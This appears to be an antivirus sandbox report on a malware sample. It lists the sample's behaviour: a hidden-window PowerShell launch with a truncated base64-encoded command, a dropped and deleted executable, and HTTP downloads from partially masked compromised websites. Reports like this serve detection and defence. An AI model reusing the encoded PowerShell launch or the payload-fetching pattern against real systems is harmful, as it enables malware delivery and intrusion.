Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwBwAG0AawBuAGcAZgBmAGMAcwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBDAHQAbwBwAHUAYQBlAGkAeAB3AHQAagAgACMAPgAgACQAVwBxAGEAbAB4AGkAcwBrAGsAYgBxAD0AJw...
Modifies file system
Creates the following files
- %HOMEPATH%\427.exe
Deletes the following files
- %HOMEPATH%\427.exe
Network activity
Connects to
- 'fu###.com.tw':443
TCP
HTTP GET requests
- http://st#####.securenetworks.pk/mn2shwl/UGw/
- http://co###sjapan.vn/wp-includes/a/hotoffice/v2u90/
- http://al###adatv.cl/wp-includes/gzl80H1/
UDP
- DNS ASK st#####.securenetworks.pk
- DNS ASK co###sjapan.vn
- DNS ASK gr##eobd.co
- DNS ASK al###adatv.cl
- DNS ASK fu###.com.tw
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwBwAG0AawBuAGcAZgBmAGMAcwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBDAHQAbwBwAHUAYQBlAGkAeAB3AHQAagAgACMAPgAgACQAVwBxAGEAbAB4AGkAcwBrAGsAYgBxAD0AJw...' (with hidden window)
